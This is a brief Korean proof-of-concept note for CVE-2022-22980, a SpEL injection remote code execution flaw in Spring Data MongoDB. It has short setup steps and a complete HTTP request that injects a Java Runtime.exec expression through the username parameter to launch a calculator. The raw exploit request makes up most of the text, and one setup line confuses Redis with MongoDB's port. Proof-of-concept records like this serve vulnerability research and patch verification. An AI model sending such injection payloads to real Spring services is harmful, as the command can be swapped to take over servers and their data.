
CVE-2022-22980의 개념 증명 익스플로잇: Spring Data MongoDB에서 사용자 이름 파라미터의 SpEL 인젝션을 통한 원격 코드 실행 취약점.
계륵 같은 취약점, 그냥 기록용.
redis 실행, 27017 포트
프로젝트 실행, springboot는 6666 포트에서 실행


GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
참고: